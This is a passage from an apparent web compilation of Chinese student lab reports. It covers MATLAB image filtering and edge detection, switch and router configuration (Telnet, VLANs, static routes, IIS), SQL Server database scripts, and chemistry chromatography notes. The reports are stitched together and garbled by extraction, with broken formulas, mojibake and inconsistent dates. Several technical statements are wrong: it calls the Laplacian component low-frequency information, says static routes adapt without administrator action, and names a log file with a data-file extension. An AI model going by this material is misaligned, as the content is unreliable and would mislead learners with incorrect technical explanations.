RR=24时的理想低通滤波结果图和滤波幅度谱图

R=11时的理想低通滤波结果图和滤波频谱图

R=5时的理想低通滤波结果图和滤波频谱图

当 R=5 时,滤波后的图像很模糊,无法分辨;

当 R=11 时,滤波后的图像比较模糊,但基本能分辨出人脸的形状; 当 R=24 时,滤波后的图像有些模糊,能分辨出脸上的器官轮廓,但由于理想低通滤波器在频域的锐截止特性,滤波后的图像有较明显的振铃现象;

当 R=88 时,滤波后的图像比较清晰,但高频分量损失后,图像边沿与文字变的有些模糊,在图像的边框附近仍有振铃现象。

2.2 对数字图像lena.img 进行频域的理想高通,同屏显示原图、幅度谱图和高通滤波的结果图。其中,取理想高通滤波的半径R 分别为

2、8 和24:

原图像及其频谱图

R=2时的理想高通滤波结果图和滤波频谱图

R=8时的理想高通滤波结果图和滤波频谱图

R=24时的理想高通滤波结果图和滤波频谱图

注:对理想高通滤波后的图像用直接灰度变换方法作了灰度范围的扩展。

当 R=2 时,滤波后的图像无直流分量,但灰度的变化部分基本上都保留了; 当 R=8时,滤波后的图像在文字和图像边缘部分的信息仍然保留; 当 R=24 时,滤波后的图像只剩下文字和白条边缘等信号突变的部分。

六、实验心得

、熟悉了MATLAB7.0的使用

、验证了二维傅里叶变换的平移性和旋转不变性。

、实现了对图像的频域滤波,掌握了频域图像增强,了解了低通滤波对图像的影响。

实 验 报 告

实验名称 课程名称

空间域图像增强 数字图像处理

姓名

成 马 力

班级

学电子信息1101

0909110108

日期 2013.11.29-- 2013.10.7

地点

综合实验楼四楼

实验二 空间域图像增强

一、实验目的

1、了解空间域图像增强的各种方法(点处理、掩模处理);

2、通过编写程序掌握采用直方图均衡化进行图像增强的方法;

3、使用邻域平均法编写程序实现图像增强,进一步掌握掩模法及其改进(加门限法)消除噪声的原理;

二、实验环境及开发工具

Windws2000/XP、MATLAB 6.x、Visual C++、Visual Basic或其它

三、实验方法

对如图所示的两幅128×1

28、256级灰度的数字图像fing_128.img和cell_128.img进行如下处理:

指纹图fing_128.img 显微医学图像(1)对原图像进行直方图均衡化处理,同屏显示处理前后图像及其直方图,比 较异同,并回答为什么数字图像均衡化后其直方图并非完全均匀分布。 (2)对原图像加入点噪声,用4-邻域平均法平滑加噪声图像(图像四周边界不处理,下同),同屏显示原图像、加噪声图像和处理后的图像。

①不加门限; ②加门限T11(其中f(m,n)2f(i,j)) f(m,n),2Nij

四、实验结果及分析

1、直方图均衡化处理 程序如下:

clear all; close all;

fid=fopen(\'C:\\Users\\lenovo\\Desktop\\fing_128.img\',\'r\');

f=fread(fid,[128,128],\'uchar\'); subplot(2,1,1); imshow(f,[0,255]); q=zeros(1,256); for x=1:128 for y=1:128

q(f(x,y)+1)=q(f(x,y)+1)+1; end end

s=q./(128*128); X=0:255; subplot(2,1,2); bar(X,s\'); figure;

t=zeros(1,256); t(1)=s(1); for i=2:256

t(i)=t(i-1)+s(i); end

subplot(2,1,1); bar(X,t\');

t0=floor(255*t+0.5); subplot(2,1,2); bar(X,t0\'); figure;

t1=zeros(1,256); for i=1:256

t1(t0(i)+1)=s(i)+t1(t0(i)+1); end

subplot(2,1,1); bar(X,t1\'); f1=zeros(128,128) for x=1:128 for y=1:128

f1(x,y)=t0(f(x,y)+1); end end

subplot(2,1,2); imshow(f1,[0,255]); 运行结果:

(1)、指纹均衡化处理

(2)、细胞的均衡化处理

2、对原图像加入点噪声

程序代码 不加门限:

clear all; close all; fid=fopen(\'C:\\Users\\lenovo\\Desktop\\fing_128.img\',\'r\');

f=fread(fid,[128,128],\'uchar\'); subplot(2,2,1); imshow(f,[0,255]); for x=1:128 for y=1:128 if x==y f(x,y)=255; elseif x+y==100 f(x,y)=0; end end end

subplot(2,2,2); imshow(f,[0,255]); f0=f; for x=2:127 for y=2:127

f0(x,y)=(f((x-1),y)+f((x+1),y)+f(x,(y-1))+f(x,(y+1)))./4;

end end

subplot(2,2,3); imshow(f0,[0,255]); t=fft2(f); T=t(1,1)/128;

f1=f; for x=2:127 for y=2:127

h=(f((x-1),y)+f((x+1),y)+f(x,(y-1))+f(x,(y+1)))./4;

if abs(f(x,y)-h)>T f1(x,y)=h; else

f1(x,y)=f(x,y); end end end

subplot(2,2,4); imshow(f1,[0,255]); 运行结果:

加门限:

clear all; close all;

fid=fopen(\'C:\\Users\\lenovo\\Desktop\\fing_128.img\',\'r\');

fg=fread(fid,[128,128],\'uchar\');

subplot(2,2,1); imshow(fg,[0,255]); a=randn(128,128); f=a.*20+fg; subplot(2,2,2); imshow(f,[0,255]); f0=f; for x=2:127 for y=2:127

f0(x,y)=(f((x-1),y)+f((x+1),y)+f(x,(y-1))+f(x,(y+1)))./4;

end end

subplot(2,2,3); imshow(f0,[0,255]); t=fft2(f); T=t(1,1)/128; f1=f; for x=2:127 for y=2:127

h=(f((x-1),y)+f((x+1),y)+f(x,(y-1))+f(x,(y+1)))./4;

if abs(f(x,y)-h)>T f1(x,y)=h; else

f1(x,y)=f(x,y); end

end end

subplot(2,2,4); imshow(f1,[0,255]); 运行结果:

(2) 细胞加入噪声及去噪

3、结果分析

(1)直方图均衡化处理后图像的对比度增强,变得相对清晰,达到了图像增强的效果。

(2)去噪的同时图像的某些细节变得模糊。

五、实验心得

1、通过本次试验了解了空间域图像增强的各种方法,如点处理、掩模处理等。

2、学会并掌握了编写采用直方图均衡化进行图像增强的方法。

实 验 报 告

实验名称 课程名称

图像边缘检测 数字图像处理

姓名

成 马 力

班级

学电子信息1101

0909110108

日期

地2013.11.19

综合实验楼四楼

实验三

图像边缘检测

一、实验目的

(1)了解并掌握使用微分算子进行图像边缘检测的基本原理;

(2)编写程序使用Laplacian算子(二阶导数算子)实现图像锐化,进一步理解图像锐化的实质;

(3)掌握使用不同梯度算子(一阶导数算子)进行图像边缘检测的原理、方法,根据实验结果分析各种算子的工作效果;

(4)总结实验过程(实验报告,左侧装订):方案、编程、调试、结果、分析、结论。

二、实验环境

操作系统:Windws2000/XP所用软件: MATLAB

6、Visual C++、Visual Basic或其它

三、实验内容及步骤

对256×256大小、256级灰度的数字图像lena.img(如图5.1所示)进行如下处理:

(1)对原图像进行锐化处理,显示处理前、后图像:

用Laplacian算子进行锐化,分1和2两种情况,各按如下不同情况给出处理结果,并回答提出的问题:

2g(m,n)f(m,n)f 1①

图1 实验图象lena.img ② g2(m,n)4f(m,n)[f(m1,n)f(m1,n)f(m,n1)f(m,n1)] 问题:(1)f(m,n)和g1(m,n)、g2(m,n)之间有何关系?g2(m,n)代表图像中的哪些信息?由此得出图像锐化的实质是什么?

(2)分别利用Roberts、Prewitt和Sobel边缘检测算子,对原图像进行边缘检测,显示处理前、后图像。

四、实验结果与分析 程序代码:

clear all; close all; fid=fopen(\'C:\\Users\\lenovo\\Desktop\\lena.img\',\'r\'); f=fread(fid,[256,256],\'uchar\'); subplot(2,2,1); imshow(f,[0,255]); g1=f;g2=f; a=1; for x=2:255 for y=2:255

g1(x,y)=f(x,y)-(f((x-1),y)+f((x+1),y)+f(x,(y-1))+f(x,(y+1))-f(x,y).*4).*a;

g2(x,y)=f(x,y).*4*a-(f((x-1),y)+f((x+1),y)+f(x,(y-1))+f(x,(y+1))).*a; end end subplot(2,2,2); imshow(g1,[0,255]); subplot(2,2,3); imshow(g2,[0,255]); 运行结果

a=1时原图、g1和g2的图像

a=2时原图、g1和g2的图像

利用Roberts、Prewitt和Sobel算子对lena.img进行边缘检测 程序代码:

clear all; close all; fid=fopen(\'C:\\Users\\lenovo\\Desktop\\lena.img\',\'r\'); f=fread(fid,[256,256],\'uchar\'); GR=f; GP=f; GS=f; for x=2:255 for y=2:255 GRx(x,y)=f(x,y)-f(x+1,y+1); GRy(x,y)=f(x,y+1)-f(x+1,y); GR(x,y)=sqrt((GRx(x,y)).^2+(GRy(x,y)).^2);

GPx(x,y)=(f(x-1,y+1)+f(x,y+1)+f(x+1,y+1))/3-(f(x-1,y-1)+f(x,y-1)+f(x+1,y-1))/3;

GPy(x,y)=(f(x-1,y-1)+f(x-1,y)+f(x-1,y+1))/3-(f(x+1,y-1)+f(x+1,y)+f(x+1,y+1))/3; GP(x,y)=sqrt((GPx(x,y)).^2+(GPy(x,y)).^2);

GSx(x,y)=(f(x-1,y+1)+2*f(x,y+1)+f(x+1,y+1))/3-(f(x-1,y-1)+2*f(x,y-1)+f(x+1,y-1))/3;

GSy(x,y)=(f(x-1,y-1)+2*f(x-1,y)+f(x-1,y+1))/3-(f(x+1,y-1)+2*f(x+1,y)+f(x+1,y+1))/3; GS(x,y)=sqrt((GSx(x,y)).^2+(GSy(x,y)).^2); end end subplot(2,2,1); imshow(f,[0,255]);title(\'ԭͼÏñ\'); subplot(2,2,2); imshow(GR,[0,255]);title(\'Roberts\'); subplot(2,2,3); imshow(GP,[0,255]);title(\'Prewitt\'); subplot(2,2,4); imshow(GS,[0,255]);title(\'Sobel\'); 运行结果:

a=2时原图、g1和g2的图像 分析:

g1(m,n)和g2(m,n)是f(m,n)的两个分量;g2(m,n)代表图像中的低频信息;因此得出图像锐化的实质是对原图像进行变换,保留高频成分。

五、实验结论

1、通过本实验了解了并掌握了使用微分算子进行图像边缘检测的基本原理;

2、学会使用Laplacian算子(二阶导数算子)实现图像锐化的程序编写。

3、掌握了使用不同梯度算子(一阶导数算子)进行图像边缘检测的原理、方法。

六、参考文献

[1] R.C.Gonzalez & R.E Woods.Digital Image Proceing(2E).Prentice Hall PTR,2002 中译本:阮秋琦等译.数字图像处理(第二版).北京:电子工业出版社,2005.3 [2] 冈萨雷斯.数字图像处理(MATLAB 版).北京:电子工业出版社,2005.9 [3] K.R.Castleman.数字图像处理.朱志刚等译.北京:电子工业出版社,1998.9 [4] 章毓晋.图象工程(上册)—图象处理和分析.北京:清华大学出版社,2003.7 [5] 何斌.Visual C++数字图像处理(第二版).北京:人民邮电出版社,2002.1

第14篇:上海工程技术大学实验报告封面

装订区域

化学化工学院实验报告

2014~2015学年第一学期

课程名称:

任课教师: 姓名/学号: 所学专业:

综合涂料实验

王继虎 弥嘉琦/041211126 高分子材料与工程

第15篇:西南大学课程实验报告8

西南大学课程实验报告

课程名称

微格教学

任课教师

代光英

学生姓名

王浪

所在班级

2011级 特殊教育

2013年

12 月 05 日

第16篇:江苏大学计算机网络实验报告专题

计算机网络实验报告册

实验一

交换机基本配置 实验学时:2学时 实验类型:验证 实验要求:必修

一、实验目的

1.掌握桌面网络组建方法

2.掌握 Quidway S系列中低端交换机几种常见配置方法

二、实验内容

1. 通过 Console口搭建配置环境 2. 通过 Telnet搭建配置环境

3. 熟悉 VRP的各种视图及各视图下的常用命令

三、实验原理、方法和手段 1. 交换机配置方式

交换机通常的配置方式有: Console方式 telnet方式 web方式

modem拨号方式

2. 命令行接口 Command-line Interface 华为网络设备中运行的操作 VRP ( Versatile Routing Platform) 向用户提 供一系列配置命令以及命令行接口,方便用户配置和管理网络设备,包 括以太网交换机。命令行有如下特性: 

通过 Console口进行本地配置 

通过 telnet进行本地或远程配置

通过 modem拨号登录到网络设备进行远程配置

配置命令分级保护,确保未授权用户无法侵入到网络设备 

用户可以随时键入<?>以获得在线帮助 1

提供网络测试命令,如 tracert、ping等,迅速诊断网络是否正常 

提供种类丰富、内容详尽的调试信息,帮助诊断网络故障 

用 telnet命令直接登录并管理其它网络设备 

提供 ftp服务,方便用户上载、下载文件

提供类似 Doskey的功能,可以执行某条历史命令

命令行解释器对关键字采取不完全匹配的搜索方法,用户只需键入 无冲突关键字即可解释

四、实验组织运行要求

1.学生在进行实验前必须进行充分的预习,熟悉实验内容;

2.学生严格遵守实验室的各项规章制度,注意人身和设备安全,配合和服 从实验室人员管理;

3.要求独立完成实验,教师可以给予一定的辅导; 4.教师检查学生的实验结果; 5.综合评定学生的实验成绩。

五、实验条件

1. 华为 Quidway S/思科 Catalyst 2960/中兴 ZXR10交换机 2. 计算机一台、配置电缆、局域网环境

六、实验步骤

通过 Console口搭建配置环境

1.如图 1-2,建立本地配置环境,只需将微机(或终端)的串口通过配置电 缆与以太网交换机的 Console口连接。 图 1‐ 1配置电缆的连接

2.在微机上运行终端仿真程序(如 Windows的超级终端),设置终端通信参 数为:波特率为 9600bit/s、8 位数据位、1 位停止位、无校验和无流控,并 选择终端类型为 VT100,如图 1-2至图

1-3所示:

图 1‐ 2运行 Terminal程序

图 1‐ 3设置 Terminal连接时参数

3. 以太网交换机上电,终端上显示以太网交换机自检信息,自检结束后提示 用户输入回车,之后将出现命令行提示符(如)。

4. 键入命令,配置以太网交换机或查看以太网交换机运行状态。需要帮助可 以随时键入“?”,具体的配置命令可以参考华为相关文档。 

通过 Telnet搭建配置环境

1.在通过 Telnet登录以太网交换机之前,需要通过

Console口在交换机上配 置欲登录的 Telnet用户名、认证口令、验证方式及权限。 system-view Enter system view, return user view with Ctrl+Z.[Quidway] user-interface vty 0 4 (0 4表示从第

0到第

4共

5个

vty用户) [Quidway-ui-vty0-4] set authentication paword simple xxxx (xxxx是欲设置 的该 Telnet用户登录口令)

[Quidway-ui-vty0-4] authentication-mode paword [Quidway-ui-vty0-4] user privilege level 3 2.配置交换机 IP地址,需要进入交换机的

VLAN接口

1视图,通常配置交 换机 VLAN接口

1的

IP地址就是配置了交换机的

IP地址。当使用

VLAN时 情况另当别论。

[Quidway] interface vlan 1 [Quidway-Vlan-interface1] ip addre x.x.x.x x.x.x.x(分别是

IP地址和子网掩 码)

3.如图 1-4所示,建立配置环境,只需将微机以太网接口通过局域网与以太 网交换机的以太网口连接。注意微机配置的

IP 地址必须与以太网交换机的 IP地址在同一个子网下。

图 1‐ 4基于网络环境的配置

在微机上运行 Telnet程序,输入与相连的以太网口所属

VLAN的

IP地址, 如图 1-5所示:

图 1‐ 5 Telnet方式配置

4.终端上显示“User Acce Verification”,并提示用户输入已设置的登录口令,口令输入正确后则出现命令行提示符(如

)。如果出现“Toomany users!”的提示,表示当前 Telnet到以太网交换机的用户过多,则请稍候再连(Quidway系列以太网交换机最多允许

5个

Telnet用户同时登录)。

5. 使用相应的命令配置以太网交换机或查看以太网交换机运行状态。需要帮 助可以随时键入“?”,具体的配置命令请参考华为相关文档。 配置实例(这里给出思科 ISO的配置过程):

Swtich>enable Switch# config terminal Switch(config)# interface vlan 1 Switch(config-if)# ip addre 192.168.1.1 255.255.255.0 Switch(config-if)# no shutdown Switch(config-if)# exit Switch(config)# line vty 0 4 Switch(config-line)# paword 123456 Switch(config-line)# login Switch(config-line)# end 熟悉 VRP的各种视图及各视图下的常用命令

1. 熟悉在用户视图、系统视图、接口视图之间的切换命令 2.充分利用?熟悉如何获得命令的关键字和格式 3. 了解使用时出现的各种错误信息的含义

七、思考题

1.

Telnet配置方式比起

console配置方式有哪些优点?

答:CONSOLE接口是用来配置交换机的,所以只有网管型交换机才有。而且还要注意,并不是所有网管型交换机都有,那是因为交换机的配置方法有多种,如通过Telnet命令行方式、Web方式、TFTP方式等,所以console配置面更广。 2. 为什么IP地址要设置在交换机的

VLAN接口上?

答:VLAN本身是个虚拟接口,只要你的PC和交换机线路通了,无论PC连接交换机哪个物理接口,都能通过VLAN接口管理交换机,用于管理交换机 。由于,二层交换机不能设置IP,管理员要管理这个交换机,就只能到现场配置,太麻烦了。在Vlan上设置IP地址,是为了方便远程管理二层交换机,同时也可以作为对应端口的网关。

实验二

基本 VLAN设置 实验学时:2学时 实验类型:验证 实验要求:必修

一、实验目的

1. 掌握配置 VLAN的基本命令

2. 在多个交换机所组成的交换网络中合理组织

VLAN

二、实验内容

1. 根据实验要求的物理拓扑结构连接以太交换网络

2. 根据实验要求的逻辑拓扑结构创建 VLAN并将相应的用户及网段划分到 对应的 VLAN中去

三、实验原理、方法和手段 1.

VLAN概述

VLAN 技术出现的一个主要原因是为了解决以太网的广播风暴。虽然通 过路由器也可以划分广播域,来减小广播风暴的影响,但路由器本身的 工作机制会增加网络数据传输的延迟,对网络的性能同样会产生一定的 影响。所以通过直接在以太网交换机上实施 VLAN,一方面解决了广播 风暴问题,另一方面也提供了高速的数据转发服务。 目前常用的 VLAN划分方式如下: 

基于端口的

VLAN 

基于 MAC地址的

VLAN 

基于子网信息的

VLAN 

基于协议的

VLAN 2.

IEEE802.1Q协议

IEEE802.1Q协议定义了以下的内容: 

VLAN的架构

VLAN中所提供的服务

VLAN实施中所涉及的协议和算法

VLAN的帧格式如图

2-1: 图 2‐1 802.1q帧格式

TPID ( Tag Protocol Identifier ) 是 IEEE定义的新的类型,表明这是一个 加了 802.1Q标签的帧。TPID包含了一个固定的值

0x8100。 TCI是帧的控制信息,它包含了下面的一些元素:

Priority:这 3位指明帧的优先级。一共有

8种优先级,0-7。IEEE 802.1Q 标准使用这 3位信息。

Canonical Format Indicator ( CFI ):CFI值为

0说明是规范格式,1为非规 范格式。它被用在令牌环/源路由 FDDI介质访问方法中来只是封装帧中 所带地址的比特次序信息。

VLAN Identifier ( VLAN ID ):这是一个 12位的域,指明

VLAN的

ID, 一共 4096个,每个支持

802.1Q协议的交换机发送出来的数据包都会包 含这个域,以指明自己属于哪一个 VLAN。

在一个交换网络环境中,以太网的帧有两种格式:有些帧是没有加上这 4 个字节标志的,称为未标记的帧(untagged frame),有些加上这 4 个字 节标志的,称为带有标记的帧(tagged frame)。 3.

VLAN配置基本命令

进入 VLAN视图及创建/删除

VLAN [undo] vlan vlan_id vlan_id是要创建的

VLAN的标识。 

给 VLAN指定端口 [undo] port interface_list interface_list 是被指定到该 VLAN 中的端口列表,该命令必须在

VLAN 7

视图下执行。

给端口指定

VLAN port acce vlan vlan_id vlan_id是该端口被指定的

VLAN标识,该命令必须在端口视图下执行。 

设置/取消接口为 VLAN Trunk port link-type {acce | trunk | hybrid} 在使用 VLAN的时候,交换机连接计算机的端口应该设置为 acce类型, 交换机之间连接的端口应该设置为 trunk类型,hybrid类型用在其它场合 中,可以参考华为相关文档。该命令必须在端口视图下执行。 

设置/取消 Trunk端口中允许通过的

VLAN [undo] port trunk permit vlan {vlan_list | all} 当某个端口被设置为 trunk 类型时,需要指定有哪些 VLAN 的帧可以通 过该端口,该命令必须在设置为 trunk类型的端口的视图下执行。

四、实验组织运行要求

1.学生在进行实验前必须进行充分的预习,熟悉实验内容; 2.学生拟定实验方案,熟悉实验内容和实验步骤;

3.学生严格遵守实验室的各项规章制度,注意人身和设备安全,配合和服 从实验室人员管理; 4.学生应独立完成实验,教师可以给予一定的辅导; 5.教师审查、分析学生实验方案和实验结果; 6.综合评定学生的实验成绩。

五、实验条件

1. 华为 Quidway/思科 Catalyst 2960/中兴 ZXR10交换机 2.

PC机、局域网环境

六、实验步骤

1. 按照图 2-2中的拓扑结构,通过配线系统将该以太交换网连接起来。

图 2‐2实验拓扑

2. 创建 VLAN,并将 PC机所连接的交换机端口划分到相应的

VLAN中, 配置实例如下: Switch>enable Switch# config terminal Switch(config)# vlan 2 Switch(config-vlan)# vlan 3 Switch(config-vlan)# exit Switch(config)# interface fa0/1 Switch(config-if)# switchport acce vlan 2 Switch(config-if)# interface fa0/2 Switch(config-if)# switchport acce vlan 3 Switch(config-if)# end

3. 查看 VLAN信息,配置实例如下: Switch# show vlan

4. 设置交换机之间的端口为 Trunk类型,并制定其封装格式和

VLAN过滤 范围,配置实例如下: Switch# config terminal Switch(config)# interface fa0/24 Switch(config-if)# switchport mode trunk Switch(config-if)# switchport trunk allowed vlan all 5. 测试 PC 机之间的连通性,构造广播流量并查看广播域的范围。

七、思考题 1. 若有一台 PC机连接交换机的

Trunk端口,则该

PC机能否进行通信? 答:可以,trunk模式下,端口用于交换机间连接。 2. 基于端口的 VLAN划分具有哪些优点?

答:1.广播风暴防范。限制网络上的广播,将网络划分为多个VLAN可减少参与广播风暴的设备数量。LAN分段可以防止广播风暴波及整个网络。

2.增强局域网的安全性,含有敏感数据的用户组可与网络的其余部分隔离,从而降低泄露机密信息的可能性。

3..成本高昂的网络升级需求减少,现有带宽和上行链路的利用率更高,因此可节约成本。4.提高IT员工效率。 5.增加网络连接的灵活性。

实验三

路由器安装与配置 实验学时:2学时 实验类型:验证 实验要求:必修

一、实验目的

1. 掌握手工配置路由表的方法 2. 掌握读懂路由表的能力

二、实验内容

1. 根据要求正确连接网络

2. 正确配置网络中设备的 IP信息

3. 正确配置路由器之间的广域网协议参数 4. 在路由器上配置静态路由协议

三、实验原理、方法和手段 1. 静态路由简介

静态路由是一种特殊的路由,由管理员手工配置而成。在组网结构较简 单、到给定目标只有一条路径的网络中,只需配置静态路由就能使路由 器正常工作。正确地设置和使用静态路由能有效地保证网络安全,并可 为重要的应用保证带宽。

使用静态路由也存在一些问题:当网络出现问题或因其它原因引起拓扑 变化时,静态路由不会自动发生改变,不需要有网络管理员的介入。 2. 静态路由的配置 静态路由的配置包括: 

配置静态路由

表 3‐ 1 配置缺省路由 表 3‐ 2

配置静态路由缺省优先级

表 3‐ 3

路由表的显示和调试 表 3‐ 4

四、实验组织运行要求

1.学生在进行实验前必须进行充分的预习,熟悉实验内容; 2.学生拟定实验方案,熟悉实验内容和实验步骤;

3.学生严格遵守实验室的各项规章制度,注意人身和设备安全,配合和服 从实验室人员管理;

4.学生应独立完成实验,教师可以给予一定的辅导; 5.教师审查、分析学生实验方案和实验结果; 6.综合评定学生的实验成绩。

五、实验条件

1.华为Quidway/思科2811/中兴ZXR路由器 2.计算机、局域网环境

六、实验步骤

1. 将计算机、交换机、路由器连接成如图 3-1的拓扑结构。 图 3‐ 1实验拓扑结构

2. 给每一台路由器的连接接口设置 IP地址和掩码,配置实例如下: Router>enable Router#hostname Router0 Router0#config terminal Router0(config)# interface fa0/0 Router0(config-if)# ip addre 192.168.1.1 255.255.255.0 Router0(config-if)# no shutdown Router0(config-if)# interface fa0/1 Router0(config-if)# ip addre 192.168.2.1 255.255.255.0 Router0(config-if)# no shutdown

配置完毕后,路由器连接的接口都处于工作状态,如图

3-2

图 3‐ 2路由器接口启动后的拓扑

3. 为 PC机设置

IP地址、子网掩码、网关地址,测试

PC机可以寻址的范 围,即与其它哪些路由器的路径可达。 4. 查看路由器的路由表,配置实例: Router0# show ip route 分析路由表的表项及路径可达范围。

5. 在路由器上添加去往非直连网络的静态路由,并测试 PC机的寻址范围, 配置实例如下:

Router0# config terminal Router0(config)# ip route 192.168.4.0 255.255.255.0 192.168.2.1 6. 查看路由器的路由表,并分析分组的路由过程。

七、思考题

1. 当路由表中存在多条下一跳同样的静态路由,应如何简化路由的配置?

答:(1)如果路由表中除了直连路由(标记为C),其他静态路由全是指向同一个下一跳,那么可以将这些静态路由删了,使用一条目的网段全0的静态默认路由代替之前的所有路由;

(2)如果这些静态路由条目只是其中大部分指向了同一个下一跳,但是还有一些静态不是指向该下一跳,那么可以根据这些静态路由的目的IP子网,看能否进行汇总。

目前简化路由表的手段主要就是做子网汇总,情况1其实也是汇总,只是汇总的范围比较大而已。

2. 试在实验环境中通过设置静态路由,形成路由环路。

实验四

网络应用层协议分析与服务配置 实验学时:2学时 实验类型:综合 实验要求:必修

一、实验目的

1. 掌握 Web服务器的设置方法 2. 掌握 FTP服务器的设置方法 3. 熟悉 Mail服务器的设置方法

二、实验内容

1. 在 Windows上运行并设置

IIS服务 2. 通过设置提供 Web、FTP、Mail服务 3. 对提供的服务进行测试

三、实验原理、方法和手段 1.

IIS之

Web服务器

在 Windows桌面上,右键点击“我的电脑”,选择“管理”,在出现的“计 算机管理”窗口中打开“Internet信息服务”控制台,双击计算机名可以 展开可管理的服务,如图 4-1所示。 图 4‐ 1计算机管理

右击“默认网站”,选择“属性”,“默认网站 属性”对话框中包含了许 多选项卡,这里经常使用的包括“网站”、“主目录”、“文档”、以及“目 录安全性”。

其中,“网站”选项卡主要用来设置

Web 站点标识、连接属性、日志记 录等。这里主要注意 Web站点所使用的

IP地址和

TCP端口号,它们将 决定用户如何访问到该 Web服务,如图

5-2所示。 图 4‐ 2网站设置

“主目录”选项卡的作用包括网站内容的来源、对网络内容的控制权限、以及应用程序的设置。在缺省的情况下,网站的内容放置在本地的

c:\\inetpub\\wwwroot目录下。管理员可以根据需要改变这些设置,如图

5-3 所示。

图 4‐ 3主目录的设置

“文档”选项卡用于指定启用的默认文档。所谓默认文档是指当浏览器 访问 Web 服务时,不需要提供想要访问的文件名,只要输入 Web 服务 器的 URL即可,服务器会自动将默认的文档提供给浏览器。目前大部分 的 Web 站点的主页文件名都为“index.htm”,当然也可以指定其它的文 件名,同时有多个文件名时,可以指定访问的先后次序,如图 5-4所示。 图 4‐ 4文档设置

“目录安全性”选项卡的主要用来指定

Web 服务器对访问用户的验证 方式。IIS 的 Web 服务缺省是不对用户进行验证的,用户直接可以访问 Web服务,如图

5-5所示。

另外,在部署一个新的网站时,可以为它单独创建一个 Web 虚拟目录, 然后为这个虚拟目录指定别名,以及站点内容所在的路径。之后要访问 这个站点的内容的话,可以通过这样形式的 URL来指定:“http://Web服 务器的域名或 IP地址/别名/“来访问。 2.

IIS之

FTP服务器

IIS的

FTP服务同样在“Internet信息服务”控制台中可以找到,缺省为 “FTP 站点”。通过右击选择属性,可以设置 FTP 服务的相关参数,如 图 5-6。

图 4‐ 6安全账户设置

“FTP站点 属性”包含“安全帐户”、“消息”、“主目录”这些选项卡。 其中,“安全账户”选项卡用于设置对访问用户的验证方式;“消息”选 项卡用于设置用户登录及退出时,系统的提示信息;“主目录”选项卡用 于设置 FTP站点的内容放置的具体位置,以及用户的访问权限。 3.

IIS之

Mail服务器

IIS的

Mail服务也可以在“Internet信息服务”控制台中可以找到,缺省 为“默认 SMTP 虚拟服务器”。通过右击选择属性,可以设置 SMTP 服 务的相关参数,如图 5-7。 图 4‐ 7虚拟服务器属性设置

“默认 SMTP虚拟服务器 属性”包含“常规”、“访问”、“邮件”、“传 递”、“LDAP路由”、“安全”这些选项卡。

其中,“常规”选项卡用于设置 IP地址和连接限制,以及日志记录;“访 问”选项卡用于设置访问控制、安全通讯等参数;“邮件”选项卡用于指 定消息信息、设置未传递报告和死信目录;“传递”选项卡用于设置出站 和本地的时间信息;“LDAP路由”用于设置是否启用

LDAP路由以及相 应的一些参数;“安全”选项卡用于设置访问用户的权限。

四、实验组织运行要求

7.学生在实验前,请先对Windows IIS的安装和简单设置进行熟悉。

8.学生在实验过程中,记录相应的服务设置信息,以及访问这些服务时的 状况。

五、实验条件

1. 提供安装了 Windows操作系统的计算机 2. 网络环境

六、实验步骤

1. 从网络上下载、或预先自己设计一个网站,将它部署到 IIS Web服务器。 在其它计算机上打开浏览器,浏览部署的网站。

2. 运行 IIS的

FTP功能,并在

FTP服务器的目录下放置一些共享文件。在 其它计算机上访问该 FTP服务器,注意登录的用户可以使用

anonymous 帐户,该用户不需要输入密码。

3. 运行 IIS的

Mail服务,并且在服务所在的计算机上再单独运行一个

Mail 服务器。在其它计算机上访问该 Mail服务。

七、思考题

1.

IIS Web服务中的虚拟目录具有什么作用?

答:两个不同文件夹下的文件之间可以互相调用 C:\\web\\和D:\\web1\\都是虚拟目录 比如C:\\web\\index.asp可以调用D:\\web1\\下的文件

2. 为什么要在 IIS Mail服务所在的计算机上,另外再单独运行一个Mail服务器?

答:一般的情况下,一台服务器是可以同时多程序在运行的。邮件服务器也是在一般的服务器上利用软件搭建出来的一种服务,IIS同样是服务器和一种服务,所以二都是没有冲突的。邮件服务器一样可以提供IIS的功能。

四个实验:

第17篇:西华大学数据库实验报告(一)

第一次作业内容

一、对数据库的操作

1 用SQL 编程新建一个名为student的数据库,包括主文件、日志文件,并定义其5个参数(name, filename, size, maxsize, filegrowth)

create database student --创建数据库 on primary --主文件建立 ( name=pstudentPQL, --定义主文件逻辑名

filename=\'E:\\pstudentPQL.mdf\', --定义主文件物理名

size=10MB, --主文件的初始容量

maxsize=20Mb, --主文件的最大容量

filegrowth=10% --增量大小

) log on --日志文件建立 ( name=lstudentPQL, --定义日志文件逻辑名

filename=\'E:\\lstudentPQL.mdf\', --定义日志文件物理名

size=2MB, --日志文件的初始容量

maxsize=unlimited, --日志文件的最大容量

filegrowth=2MB --增量大小

) Go 运行后的截图:

2 用SQL 编程查看student数据库信息

sp_helpdb student --查看数据库student属性 go

运行后的截图:

3 向刚建立的student数据库中添加2个辅助文件,并编组管理,查看student数据库信息。添加、编组、查看操作要求在一个程序文件中实现

alter database student --指定要更改的数据库

add filegroup 辅助文件组 --添加文件组 go alter database student add file --添加文件 ( name=studentPQL01, --定义文件逻辑名

filename=\'E:\\studentPQL01.ndf\', --定义文件物理名

size=1MB, --文件初始容量

maxsize=5MB, --文件最大容量

filegrowth=10% --文件增量

), ( name=studentPQL02, filename=\'E:\\studentPQL02.ndf\', size=2MB, maxsize=10MB, filegrowth=10% ) to filegroup 辅助文件组 --添加到指定的文件组中 Go

4 用SQL 编程删除其中一个辅助文件,并查看结果信息

alter database student --指定要更改的数据库 remove file studentPQL02 --删除文件 go 运行后结果截图:

5 用SQL 其中一个命令将student数据库更改名字为stu alter database student --指定要更改的数据库 modify name = stu --更改数据库名称 Go 运行后结果截图:

sp_renamedb\'stu\',\'student\' Go 运行后结果截图:

--将名为stu的数据库更名为student 6 用SQL 另一个命令将stu数据库还原为student

7 用SQL 编程删除student数据库(drop) drop database student Go 运行后结果截图:

--删除数据库

8 上述1-7的内容使用SQL Server管理器而不是SQL编程的方式重新实现一遍

第18篇:天津城建大学仪器分析考题2

1.分配系数:色谱分离过程涉及被测物在固定相和流动相中的分配平衡。

2.不同组分有不同的分配系数是不同组分分离的根本原因。3.分配比:k=KVs/Vm=K/β

β:相比是反应色谱柱柱形的特征的参数。

4.描述色谱峰有三个参数:峰高(或峰面积).区域宽度和保留值。

5.相对保留值r1,2是指组分2的调整保留值与组分1的调整保留值之比。

